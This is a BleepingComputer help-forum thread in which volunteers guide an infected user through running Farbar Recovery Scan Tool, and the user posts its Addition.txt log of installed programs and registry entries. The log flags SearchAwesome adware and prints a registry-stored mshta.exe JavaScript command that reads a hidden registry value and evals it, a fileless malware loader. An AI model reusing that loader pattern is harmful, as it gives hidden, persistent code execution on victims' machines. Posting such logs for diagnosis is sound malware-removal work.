Help , Need to get virus out my laptop


This topic is locked
137 replies to this topic

#1 danban

  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 30 May 2018 - 02:14 PM

Hello,

My name is Daniel.

My Asus laptop got infected with a virus.

I managed to stop it in time and it seems it didn't do damage to my computer, which is working properly,
but I can't get access to the internet.

All Wi-Fi and internet connections are blocked.

I tried fixing the settings and that didn't work.

I do have free versions of RogueKiller, Rkill, Bitdefender and Malwarebytes
on my computer and have used them successfully in the past to clean out viruses.

The problem is that to use all those programs, they need access permission to the site and the internet,
and I'm locked out.

If anybody knows how to get around this problem I would appreciate it.

I'm typing this on this forum board using another computer, so I'll keep checking for answers here.

Dan

 





#2 Oh My!

    Adware and Spyware and Malware.....

  • Malware Response Instructor
  • 37,758 posts
  • Gender:Male
  • Location:California

Posted 30 May 2018 - 09:27 PM

Greetings Dan and welcome to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

===================================================

Ground Rules:

  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.

===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Please do this. If necessary, download the below program onto a USB device from a clean computer and transfer it over to the infected computer's Desktop.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------

  • Download Farbar Recovery Scan Tool for either 32 bit or 64 bit systems and save it to your Desktop. <<< Important
  • Right click on the icon and select Run as administrator
  • Click Yes to the disclaimer
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of each report in separate reply windows

===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.

  • FRST results
  • Addition log

Edited by Oh My!, 30 May 2018 - 09:28 PM.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 RayS

  • Malware Response Team
  • 2,414 posts
  • Gender:Male
  • Location:USA

Posted 30 May 2018 - 09:58 PM

Hi danban,

My name is Ray and I will be working with Gary. Please copy and paste FRST.txt and Addition.txt into the body of your reply as requested.

Thank you,

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#4 danban

  • Topic Starter
  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 31 May 2018 - 11:06 AM

Hello Ray & Gary.

Thanks for the reply.

I've been on here before in the past and had people fix my past problems.

I'm typing this on another computer in this forum,
and that computer is far from the location of my laptop that has the virus.

So expect a 1 day delay for each response back with the txt and info for your directions.

I'll follow the steps you gave me and work on it tonight,
and get back to you tomorrow.

Best,

Dan



#5 RayS

  • Malware Response Team
  • 2,414 posts
  • Gender:Male
  • Location:USA

Posted 31 May 2018 - 03:45 PM

Hi Dan,

Thank you for keeping me updated.

Ray




#6 danban

  • Topic Starter
  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 01 June 2018 - 11:22 AM

Hi,
I did the scan with the Farbar Recovery Scan Tool and here is the Addition.txt:


Addition Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
Ran by Dan (31-05-2018 20:50:32)
Running from C:\Users\Dan\Desktop
Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)
Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan
Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)
7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden
7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)
Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)
AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)
AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)
AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)
AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)
AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)
AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)
AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)
AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)
AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)
AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)
AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandisoft.com)
Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")
Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")
Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")
Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)
CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)
CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)
DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version: - )
Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version: - )
FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)
FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)
Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)
FrostWire 6.0.8 (HKLM-x32\...\FrostWire 6) (Version: 6.0.8.1 - FrostWire LLC)
Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)
GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)
ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version: - )
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
JBridge (HKLM-x32\...\JBridge) (Version: - JBridge)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version: - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)
MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)
Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version: - )
MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)
Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)
mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version: - )
Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version: - Digimania Ltd)
Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version: - Digimania Ltd)
Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version: - Digimania Ltd)
Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version: - Digimania Ltd)
Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version: - Digimania Ltd)
Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version: - Digimania Ltd)
Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version: - Digimania Ltd)
Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)
ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)
PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version: - )
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)
Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)
SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION
ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version: - )
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)
Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)
Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )
Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version: - )
Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version: - WildTangent) Hidden
Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version: - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden
VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)
WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)
WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc)
Windows Driver Package - ASUS (ATP) Mouse (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version: - )
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version: - Digiarty Software, Inc.)
WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)
WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version: - Yahoo! Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: -> <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
